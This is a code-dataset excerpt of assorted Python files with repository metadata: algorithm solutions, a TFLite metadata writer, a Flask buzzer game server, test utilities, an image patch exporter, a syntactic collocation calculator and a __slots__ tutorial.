hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
abb50af6b7515480308ed4bb0d9a4639ac7b7b92
| 541 |
py
|
Python
|
leetcode/047-Permutations-II/Perm2_003.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/047-Permutations-II/Perm2_003.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/047-Permutations-II/Perm2_003.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution:
# @param {integer[]} nums
# @return {integer[][]}
def permuteUnique(self, nums):
if len(nums) == 1:
return [nums]
nums.sort()
res = []
i = 0
while i < len(nums):
sym = nums[i]
tmp = nums[:i] + nums[i + 1:]
sub = self.permuteUnique(tmp)
res.extend([[nums[i]] + s for s in sub])
while i < len(nums):
if nums[i] != sym:
break
i += 1
return res
| 27.05 | 52 | 0.406654 |
055253959bb9b57cbb2874fe7f19b95144529cdb
| 4,480 |
py
|
Python
|
yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
import os
from tflite_support import metadata_schema_py_generated as _metadata_fb
from constants import BOUNDINGBOX_NAME, CLASSES_NAME, SCORES_NAME, NUMBER_NAME, DETECTIONS_NAME, PREDICTIONS_NAME
from tf_metadata.metadata_utils import MetadataHelper
class OutputMetadataWriter(MetadataHelper):
def __init__(self, output_order, labels_path, nb_labels, max_det, multiple_outputs=False):
self.output_order = output_order
self.labels_path = labels_path
self.nb_labels = nb_labels
self.max_det = max_det
self.multiple_outputs = multiple_outputs
def write(self):
if self.multiple_outputs:
if len(self.output_order) != 4:
raise ValueError(
f"Expected 4 output ({BOUNDINGBOX_NAME}, {CLASSES_NAME}, {SCORES_NAME}, {NUMBER_NAME}) but got {len(self.output_order)} output{'s' if len(self.output_order) > 1 else ''} ({', '.join(self.output_order)})")
yxyx_meta = self.__create_yxyx_meta()
class_meta = self.__create_class_meta()
score_meta = self.__create_score_meta()
nb_detected_meta = self.__create_nb_detected_meta()
group = _metadata_fb.TensorGroupT()
group.name = DETECTIONS_NAME
group.tensorNames = [yxyx_meta.name, class_meta.name, score_meta.name]
output_map = {BOUNDINGBOX_NAME: yxyx_meta, CLASSES_NAME: class_meta,
SCORES_NAME: score_meta, NUMBER_NAME: nb_detected_meta}
output_metadata = [output_map[output_name] for output_name in self.output_order]
output_group = [group]
return output_metadata, output_group
else:
# Predictions
if len(self.output_order) != 1:
raise ValueError(
f"Expected 1 output ({PREDICTIONS_NAME}) but got {len(self.output_order)} output{'s' if len(self.output_order) > 1 else ''} ({', '.join(self.output_order)})")
predictions_meta = self.__create_prediction_meta()
return [predictions_meta], None
def __create_prediction_meta(self):
predictions_meta = _metadata_fb.TensorMetadataT()
predictions_meta.name = PREDICTIONS_NAME
predictions_meta.description = "The predictions made by each grid cell of the model on which one needs to run NMS."
self._add_content_feature(predictions_meta)
self._add_stats(predictions_meta, 1.0, 0)
self.__add_labels_file(predictions_meta)
return predictions_meta
def __create_yxyx_meta(self):
yxyx_meta = _metadata_fb.TensorMetadataT()
yxyx_meta.name = BOUNDINGBOX_NAME
yxyx_meta.description = "The bounding boxes coordinates (x1, y1) upper left, (x2, y2) bottom right (normalized to input image - resized)."
self._add_content_bounding_box(yxyx_meta)
self._add_range(yxyx_meta)
self._add_stats(yxyx_meta, 1.0, 0.0)
return yxyx_meta
def __create_class_meta(self):
class_meta = _metadata_fb.TensorMetadataT()
class_meta.name = CLASSES_NAME
class_meta.description = "The class corresponding to each bounding box."
self._add_content_feature(class_meta)
self._add_range(class_meta)
self._add_stats(class_meta, self.nb_labels, 0)
self.__add_labels_file(class_meta)
return class_meta
def __create_score_meta(self):
score_meta = _metadata_fb.TensorMetadataT()
score_meta.name = SCORES_NAME
score_meta.description = "The confidence score corresponding to each bounding box."
self._add_content_feature(score_meta)
self._add_range(score_meta)
self._add_stats(score_meta, 1.0, 0.0)
return score_meta
def __create_nb_detected_meta(self):
nb_detected_meta = _metadata_fb.TensorMetadataT()
nb_detected_meta.name = NUMBER_NAME
nb_detected_meta.description = "The number of detected bounding boxes."
self._add_content_feature(nb_detected_meta)
self._add_stats(nb_detected_meta, self.max_det, 0.0)
return nb_detected_meta
def __add_labels_file(self, meta):
label_file = _metadata_fb.AssociatedFileT()
label_file.name = os.path.basename(self.labels_path)
label_file.description = "Labels for objects that the model can detect."
label_file.type = _metadata_fb.AssociatedFileType.TENSOR_VALUE_LABELS
meta.associatedFiles = [label_file]
| 46.666667 | 224 | 0.691518 |
055b9b1ed902e749b70bf960bf976fec8934c8c6
| 243 |
py
|
Python
|
power-of-three/power-of-three.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | 2 |
2021-12-05T14:29:06.000Z
|
2022-01-01T05:46:13.000Z
|
power-of-three/power-of-three.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
power-of-three/power-of-three.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
class Solution:
def isPowerOfThree(self, n: int) -> bool:
if n<=0:
return False
while(n>1):
if n%3==0:
n/=3
else:
return False
return True
| 22.090909 | 45 | 0.395062 |
fb25547f89b759492d407eeb6a815e4b58adb01f
| 423 |
py
|
Python
|
minimax.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
minimax.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
minimax.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# https://www.hackerrank.com/challenges/mini-max-sum/problem
def miniMaxSum(arr):
sortedArr = sorted(arr)
smallest = sum(sortedArr) - sortedArr[-1]
largest = sum(sortedArr) - sortedArr[0]
print(str(smallest) + " " + str(largest))
if __name__ == '__main__':
arr = list(map(int, input().rstrip().split()))
miniMaxSum(arr)
| 18.391304 | 60 | 0.671395 |
34cc065b01200580f70ecf4add62902c5755d542
| 1,813 |
py
|
Python
|
coco2yolov5-converter/tests/converter/test_filesystem_util.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
coco2yolov5-converter/tests/converter/test_filesystem_util.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
coco2yolov5-converter/tests/converter/test_filesystem_util.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
# disabling PyLint docstring, no-self-using
# pylint: disable=C0114,C0115,C0116,R0201
import tempfile
from pathlib import Path
from unittest.case import TestCase
from src.converter.filesystem_util import FileSystemUtil
class YoloHelperTest(TestCase):
def test_folder_structure(self):
with tempfile.TemporaryDirectory() as tmp_dir:
print('created temporary directory', tmp_dir)
output_path = Path(tmp_dir) / 'output'
test_items = [
output_path / 'images' / 'train',
output_path / 'images' / 'val',
output_path / 'labels' / 'train',
output_path / 'labels' / 'val',
]
FileSystemUtil.create_yolo_folder_structure(output_path)
for test_item in test_items:
self.assertTrue(test_item.exists())
self.assertTrue(test_item.is_dir())
# even better: does it contain more folders/files than needed?
def test_folder_structure_can_be_created_multiple_times(self):
with tempfile.TemporaryDirectory() as tmp_dir:
print('created temporary directory', tmp_dir)
output_path = Path(tmp_dir) / 'output'
test_items = [
output_path / 'images' / 'train',
output_path / 'images' / 'val',
output_path / 'labels' / 'train',
output_path / 'labels' / 'val',
]
FileSystemUtil.create_yolo_folder_structure(output_path)
FileSystemUtil.create_yolo_folder_structure(output_path)
for test_item in test_items:
self.assertTrue(test_item.exists())
self.assertTrue(test_item.is_dir())
# even better: does it contain more folders/files than needed?
| 37.770833 | 74 | 0.614451 |
fd37ded0af851467dd99af7d68b33ab91df9e723
| 4,868 |
py
|
Python
|
python/main.py
|
MegaAdragon/MagicBuzzer
|
f1cd2aab7827045a82b0d5e6643d48b06cbf27af
|
[
"MIT"
] | null | null | null |
python/main.py
|
MegaAdragon/MagicBuzzer
|
f1cd2aab7827045a82b0d5e6643d48b06cbf27af
|
[
"MIT"
] | null | null | null |
python/main.py
|
MegaAdragon/MagicBuzzer
|
f1cd2aab7827045a82b0d5e6643d48b06cbf27af
|
[
"MIT"
] | null | null | null |
import math
import socket
import time
import math
import select
import threading
from flask import Flask, render_template, request, jsonify, make_response
clients = []
app = Flask(__name__)
def get_client(**kwargs):
if len(clients) < 1:
return None
for key, value in kwargs.items():
for c in clients:
if c[key] == value:
return c
return None
def reset_buzzer():
for c in clients:
c['socket'].sendall(bytearray([0x10, 0xFF]))
c['buzzered'] = False
c['buzzerTick'] = 0
@app.route('/')
def home():
return render_template('buzzer.html', clients=clients)
@app.route('/api/v1/buzzer/all', methods=['GET'])
def api_all():
buzzer_list = []
# FIXME: this is not very efficient
for c in clients:
buzzer = {'addr': c['addr']}
if 'buzzered' in c:
buzzer['buzzered'] = c['buzzered']
buzzer['buzzerTick'] = c['buzzerTick']
if c['addr'] == '192.168.0.70' or c['addr'] == '192.168.0.23':
buzzer['color'] = '#478eff'
elif c['addr'] == '192.168.0.183' or c['addr'] == '192.168.0.24':
buzzer['color'] = '#fcf568'
elif c['addr'] == '192.168.0.17':
buzzer['color'] = '#ff5e5e'
buzzer_list.append(buzzer)
return jsonify(buzzer_list)
@app.route('/api/v1/buzzer/reset', methods=['POST'])
def api_reset():
reset_buzzer()
return make_response("Success", 200)
def handle_data(sock, cmd, data):
if cmd == 0x01 and len(data) == 4:
buzzerTick = int.from_bytes(data, byteorder='little')
print(tick, "BUZZERED", sock.getpeername(), buzzerTick)
c = get_client(socket=sock)
c['buzzered'] = True
c['buzzerTick'] = buzzerTick
elif cmd == 0xAA:
c = get_client(socket=sock)
c['heartbeat'] = tick
else:
print(sock.getpeername(), "unknown server response")
assert False
data_buffer = bytes()
def on_data_received(sock, data):
global data_buffer
data_buffer += data
header_size = 2
while True:
if len(data_buffer) < header_size:
# not enough data
break
header = data_buffer[:header_size]
size = header[1]
if len(data_buffer) < header_size + size:
# wait for complete payload
break
# Read the content of the message body
body = data_buffer[header_size:header_size + size]
# data processing
handle_data(sock, header[0], body)
# Get the next packet
data_buffer = data_buffer[header_size + size:]
if __name__ == '__main__':
# run flask in own thread
threading.Thread(target=app.run, daemon=True, kwargs={'host': '0.0.0.0', 'port': 5000, 'debug': False}).start()
start_time = time.time()
udp_sync_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
udp_sync_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# listen to this port
udp_sync_socket.bind(('', 4210))
udp_sync_socket.settimeout(1)
udp_sync_socket.setblocking(False)
last_sync = 0
last_check_alive = 0
while True:
tick = (time.time() - start_time) * 1000 # tick in ms
if time.time() - last_sync > 5.0:
last_sync = time.time()
print("sync broadcast send", math.ceil(tick))
udp_sync_socket.sendto(math.ceil(tick).to_bytes(4, byteorder='little'), ('<broadcast>', 4210))
try:
data, addr = udp_sync_socket.recvfrom(128)
# FIXME
if addr[0] != '192.168.0.247':
print(tick, "tick from", addr, int.from_bytes(data, byteorder='little'))
c = get_client(addr=addr[0])
if c is None:
print("open TCP socket")
c = {'socket': socket.socket(socket.AF_INET, socket.SOCK_STREAM), 'addr': addr[0]}
c['socket'].settimeout(1)
c['socket'].connect((addr[0], 9999))
c['heartbeat'] = tick
clients.append(c)
except socket.error:
pass # no data yet
socket_list = []
for c in clients:
socket_list.append(c['socket'])
# Get the list sockets which are readable
read_sockets, write_sockets, error_sockets = select.select(socket_list, [], socket_list, 0.1)
for sock in read_sockets:
data = sock.recv(128)
on_data_received(sock, data)
for sock in error_sockets:
print("error socket", sock)
assert False
for c in clients:
if tick - c['heartbeat'] > 3000:
print(c['socket'].getpeername(), "Heartbeat timeout")
clients.remove(c)
time.sleep(0.1)
| 27.817143 | 115 | 0.572514 |
b5c5680c3e49184800e562878d10e979ec562de2
| 2,507 |
py
|
Python
|
TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py
|
mcwimm/pyMANGA
|
6c7b53087e53b116bb02f91c33974f3dfd9a46de
|
[
"MIT"
] | 1 |
2021-03-16T08:35:50.000Z
|
2021-03-16T08:35:50.000Z
|
TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py
|
mcwimm/pyMANGA
|
6c7b53087e53b116bb02f91c33974f3dfd9a46de
|
[
"MIT"
] | 67 |
2019-11-14T11:29:52.000Z
|
2022-03-09T14:37:11.000Z
|
TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py
|
mcwimm/pyMANGA
|
6c7b53087e53b116bb02f91c33974f3dfd9a46de
|
[
"MIT"
] | 6 |
2019-11-12T11:11:41.000Z
|
2021-08-12T13:57:22.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: [email protected]
"""
from TreeOutputLib.OneTimestepOneFile.OneTimestepOneFile import \
OneTimestepOneFile
import os
## Output class. This class creates one file per tree at a defined location.
# A line containing time, position, desired geometric measures and desired
# parameters is written at every nth timestep.
class OneTreeOneFile(OneTimestepOneFile):
## Constructor of dummy objects in order to drop output
# @param args xml element parsed from project to this constructor.
def __init__(self, args):
super().__init__(args)
for path in os.listdir(self.output_dir):
full_path = os.path.join(self.output_dir, path)
if os.path.isfile(full_path):
os.remove(full_path)
## Writes output to predefined folder
# For each tree a file is created and updated throughout the simulation.
# This function is only able to work, if the output directory exists and
# is empty at the begin of the model run
def writeOutput(self, tree_groups, time):
self._output_counter = (self._output_counter %
self.output_each_nth_timestep)
if self._output_counter == 0:
delimiter = "\t"
files_in_folder = os.listdir(self.output_dir)
for group_name, tree_group in tree_groups.items():
for tree in tree_group.getTrees():
growth_information = tree.getGrowthConceptInformation()
filename = (group_name + "_" + "%09.0d" % (tree.getId()) +
".csv")
file = open(os.path.join(self.output_dir, filename), "a")
if filename not in files_in_folder:
string = ""
string += 'time' + delimiter + 'x' + delimiter + 'y'
string = super().addSelectedHeadings(string, delimiter)
string += "\n"
file.write(string)
string = ""
string += (str(time) + delimiter + str(tree.x) +
delimiter + str(tree.y))
string = super().addSelectedOutputs(
tree, string, delimiter, growth_information)
string += "\n"
file.write(string)
file.close()
self._output_counter += 1
| 43.982456 | 79 | 0.568408 |
c83b4611a39b9c68094fd83f1e017bc9d92d38b3
| 4,590 |
py
|
Python
|
Utils/py/ball_detector/combine_patches.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/ball_detector/combine_patches.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/ball_detector/combine_patches.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
import os
import sys
from scipy import misc
import numpy as np
import json
from naoth import matlab_tools as mat
import patchReader as patchReader
patch_size = (12, 12) # width, height
def load_labels(patchdata, file):
if not os.path.isfile(file):
print('Label file does not exist. To export the patches regardless run this file with the --all option')
return
patch_to_label = np.negative(np.ones((len(patchdata),), dtype=np.int))
label_ids = []
with open(file, 'r') as data_file:
labels = json.load(data_file)
for name in labels:
patch_to_label[labels[name]] = len(label_ids)
label_ids += [name]
return patch_to_label, label_ids
def log_to_matrix(path):
print("Process: {}".format(path))
# type: 0-'Y', 1-'YUV', 2-'YUVC'
patchtype = 0
patchdata, _ = patchReader.read_all_patches_from_log(path, type = patchtype)
if len(patchdata) == 0:
print("ERROR: file doesn't contain any patches of the type {0}".format(patchtype))
return
# load the label file
base_file, file_extension = os.path.splitext(path)
label_file = base_file + '.json'
if not os.path.exists(label_file):
print ("ERROR: file with labels does not exists: {}".format(label_file))
return
patch_to_label, label_ids = load_labels(patchdata, label_file)
# export the patches
imgs = {}
for i in range(len(patchdata)):
p = patchdata[i]
if len(p) == 4*patch_size[0]*patch_size[1]:
a = np.array(p[0::4]).astype(float)
a = np.transpose(np.reshape(a, patch_size))
b = np.array(p[3::4]).astype(float)
b = np.transpose(np.reshape(b, patch_size))
else:
a = np.array(p).astype(float)
a = np.transpose(np.reshape(a, patch_size))
im = np.stack((a,a,a), axis=2)
if patch_to_label[i] not in imgs:
imgs[patch_to_label[i]] = [im]
else:
imgs[patch_to_label[i]] += [im]
# rgba
'''
rgba = np.zeros((patch_size[0],patch_size[1],4), dtype=np.uint8)
rgba[:,:,0] = a
rgba[:,:,1] = a
rgba[:,:,2] = a
rgba[:,:,3] = np.not_equal(b, 7)*255
cv2.imwrite(file_path, rgba)
'''
# grayscale
#yuv888 = np.zeros(patch_size[0]*patch_size[1], dtype=np.uint8)
#yuv888 = np.reshape(a, patch_size[0]*patch_size[1])
#gray_image = cv2.cvtColor(yuv888, cv2.COLOR_BGR2GRAY)
# remove green:
# gray + set green to 0 (used for balls)
# a = np.multiply(np.not_equal(b, 7), a)
#cv2.imwrite(file_path, a)
for i in imgs:
if i < 0:
name = "none"
else:
name = label_ids[i]
save_images(imgs[i], "{0}_{1}.png".format(os.path.basename(base_file),name))
def save_images(imgs, path):
if len(imgs) == 0:
print("ERROR: no patches to export")
# HACK: for matlab we need a different shape
b = np.stack(imgs, axis = 3)
mat.savemat("./test.mat", {"images":b})
b = np.stack(imgs)
# HACK: multiply the channel
print b.shape
if len(imgs[0].shape) == 2:
b = np.stack((b,b,b), axis = 3)
print b.shape
print (imgs[0].shape)
# export a matrix
s = imgs[0].shape[0]
assert(s == imgs[0].shape[1])
n = 100
m = int(b.shape[0]/n)
if m*n < b.size:
m += 1
print s,n,m
M = np.zeros((s*m,s*n,3))
for i in range(0,b.shape[0]):
x = i % n
y = int(i / n)
M[s*y:s*(y+1),s*x:s*(x+1),:] = b[i,:,:,:]
print M.shape
misc.imsave(path,M)
def directory_to_matrix(path, name=None):
if name is None:
name = os.path.basename(path)
print("Process: {}".format(path))
imgs = []
for filename in os.listdir(path):
file_path = os.path.join(path, filename)
if filename.endswith('.png'):
im = misc.imread(file_path)
# add the channel dimension
if len(im.shape) == 2:
im = np.expand_dims(im, axis = 2)
imgs += [im]
elif os.path.isdir(file_path):
directory_to_matrix(file_path, name + '_' + filename)
elif filename.endswith(".log"):
log_to_matrix(file_path)
if len(imgs) == 0:
print("No images found")
return None
else:
print("Images found: {}".format(len(imgs)))
if not os.path.isdir('./export'):
os.mkdir('./export')
save_images(imgs, './export/{0}.png'.format(name))
if __name__ == "__main__":
if len(sys.argv) > 1:
path = sys.argv[-1]
if os.path.exists(path) and os.path.isdir(path):
directory_to_matrix(path)
elif path.endswith(".log"):
log_to_matrix(path)
else:
print "ERROR: path doesn't exist ", path
| 25.359116 | 110 | 0.602397 |
c0b86c65e559fe1b3c42c1561da2c3872b2ecf16
| 43 |
py
|
Python
|
src/__init__.py
|
andrewnachtigal/wind-forecasting
|
ac3669f10d5709ae202b254eb8519b0730109467
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
andrewnachtigal/wind-forecasting
|
ac3669f10d5709ae202b254eb8519b0730109467
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
andrewnachtigal/wind-forecasting
|
ac3669f10d5709ae202b254eb8519b0730109467
|
[
"MIT"
] | 1 |
2019-10-08T04:18:41.000Z
|
2019-10-08T04:18:41.000Z
|
# treat directories as containing packages
| 21.5 | 42 | 0.837209 |
f19b0435f47b13ece319bca6391556e45a379267
| 239 |
py
|
Python
|
packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from fastapi import FastAPI
from watchmen_rest_doll.doll import ask_saml2_enabled
def install_sso_router(app: FastAPI) -> None:
if ask_saml2_enabled():
from .saml import auth_saml_router
app.include_router(auth_saml_router.router)
| 23.9 | 53 | 0.820084 |
8d7321c5cee72da0e57fa059d40128166642c5e1
| 1,306 |
py
|
Python
|
tmp/tmp_app.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 6 |
2020-04-30T08:05:51.000Z
|
2021-12-23T02:49:01.000Z
|
tmp/tmp_app.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
tmp/tmp_app.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 2 |
2020-06-15T03:30:45.000Z
|
2020-08-02T11:21:03.000Z
|
from flask import Flask, url_for, request
from common.libs.UrlUtils import UrlManager
from tmp.tmp_route_map import route_order
from flask_sqlalchemy import SQLAlchemy
"""
每次发版有个版本号 201811271629
"""
app = Flask(__name__)
app.register_blueprint(route_order, url_prefix='/order')
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]/mysql'
track_modifications = app.config.setdefault('SQLALCHEMY_TRACK_MODIFICATIONS', True)
db = SQLAlchemy(app)
@app.route('/')
def hello_world():
url = url_for('index')
url_1 = UrlManager.build_url('/api')
url_2 = UrlManager.build_static_url("/css/reset.css")
msg = f'Hello World! url: {url} ; url_1:{url_1} ; url_2: {url_2}'
app.logger.error(msg)
app.logger.info(msg)
app.logger.debug(msg)
return msg
@app.route('/api')
def index():
return 'index page'
@app.route('/api/hello')
def hello():
from sqlalchemy import text
sql = text("SELECT * FROM `user`")
result = db.engine.execute(sql)
for row in result:
app.logger.info(row)
return 'api - hello '
@app.errorhandler(404)
def page_not_found(error):
app.logger.error(request.path)
app.logger.error(error)
return 'this page does not exist', 404
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
| 22.912281 | 83 | 0.694487 |
93b5aea78b03946fe758e5177103dbda4c8b403a
| 3,886 |
py
|
Python
|
collocations_syntax.py
|
melandresen/DHd2020
|
62a53be823364dd3360e377d569e706ffeb738f9
|
[
"Apache-2.0"
] | null | null | null |
collocations_syntax.py
|
melandresen/DHd2020
|
62a53be823364dd3360e377d569e706ffeb738f9
|
[
"Apache-2.0"
] | null | null | null |
collocations_syntax.py
|
melandresen/DHd2020
|
62a53be823364dd3360e377d569e706ffeb738f9
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python 3.7
# Author: Melanie Andresen ([email protected])
# written in the context of the research project hermA (www.herma.uni-hamburg.de)
# funded by Landesforschungsförderung Hamburg
########################################################################################
# calculate syntax-based collocations
########################################################################################
import re
import numpy as np
from scipy.stats import chi2_contingency
import pandas as pd
from collections import Counter
from corpus_classes import Corpus
def get_relations(corpus):
"""
Extract a list of binary syntactic relations from the corpus
input: Corpus object (see corpus_classes.py)
output: list of all binary syntactic relations in the corpus
"""
relations = []
no_of_complex_verbs = 0
for text in corpus.files:
for sentence in text.sentences:
for word in sentence.words:
if word.head == 0: # skip the root
continue
head = sentence.words[word.head - 1] # identify head of current token
relations.append((word.lemma, word.deprel, head.lemma)) # append token, relation and head token
# additional handling of complex verb forms:
if re.match('VA', head.pos): # if head is auxiliary verb, search for dependent full verb
for word2 in sentence.words:
if word2.head == head.id and re.match('VV', word2.pos) and word2 != word:
relations.append((word.lemma, word.deprel, word2.lemma))
no_of_complex_verbs += 1
print('Relations from {} extracted.'.format(text.path))
print('(Added {} complex verbs)\n'.format(no_of_complex_verbs))
return relations
def get_collocations(relations):
"""
Calculate collocations based on the list of all relations in the corpus
input: list of all binary syntactic relations in the corpus (result of get_relations())
output: pandas DataFrame with all syntactic collocations and their llr scores
"""
print('Calculating collocations (this may take a while)...')
relation_types = set([item[1] for item in relations])
results = pd.DataFrame(columns=['word_1', 'relation', 'word_2', 'llr', 'frequency'])
for relation_type in relation_types:
print('Calculating scores for {}...'.format(relation_type))
instances = [item for item in relations if item[1] == relation_type]
bigram_counts = Counter(instances)
# The following line excludes collocations with frequency 1 from the calculation.
# Comment out if you want to include those.
bigram_counts = {k: v for (k,v) in bigram_counts.items() if v > 1}
unigram_counts_pos1 = Counter([item[0] for item in instances])
unigram_counts_pos2 = Counter([item[2] for item in instances])
all_bigrams_count = sum(bigram_counts.values())
for bigram in bigram_counts:
frequencies = np.array([[bigram_counts[bigram], unigram_counts_pos1[bigram[0]]], [unigram_counts_pos2[bigram[2]], all_bigrams_count]])
g, p, dof, expctd = chi2_contingency(frequencies, lambda_="log-likelihood")
results = results.append(pd.DataFrame([[bigram[0], bigram[1], bigram[2], g, bigram_counts[bigram]]], columns=['word_1', 'relation', 'word_2', 'llr', 'frequency']))
results = results.iloc[(-results['llr'].abs()).argsort()] # sort dataframe by absolute value of llr
results = results.reset_index(drop=True) # update index
return results
directory = 'demo-corpus/'
corpus = Corpus(directory)
relations = get_relations(corpus)
result = get_collocations(relations)
result.to_csv('collocations_syntax.txt', sep='\t')
| 44.159091 | 175 | 0.635872 |
191fb99d0f5ea76f1a66019c2cda39b21fcb2511
| 969 |
py
|
Python
|
top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | 1 |
2020-01-16T09:23:43.000Z
|
2020-01-16T09:23:43.000Z
|
top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
from types import MethodType
# 使用__slots__
'''
限制实例的属性: Python允许在定义class的时候, 定义一个特殊的__slots__变量来限制该class实例能添加的属性
注意:
__slots__定义的属性仅对当前类实例起作用, 对继承的子类是不起作用的
__slots__限制的是实例属性的添加,不限制类属性添加
'''
class Student(object):
# 用tuple定义允许绑定的属性名称
__slots__ = ('name', 'age')
pass
'''
s = Student()
# 动态给实例绑定一个属性
s.name = 'Michael'
print(s.name)
# 给实例绑定一个方法
def set_age(self, age): # 定义一个函数作为实例方法
self.age = age
# 给实例绑定一个方法
s.set_agea = MethodType(set_age, s)
s.set_agea(25)
print(s.age)
# 给一个实例绑定的方法, 对另一个实例是不起作用的
# 给class绑定方法
def set_score(self, score):
self.score = score
Student.set_score = set_score
s.set_score(100)
print(s.score)
s2 = Student()
s2.set_score(200)
print(s2.score)
'''
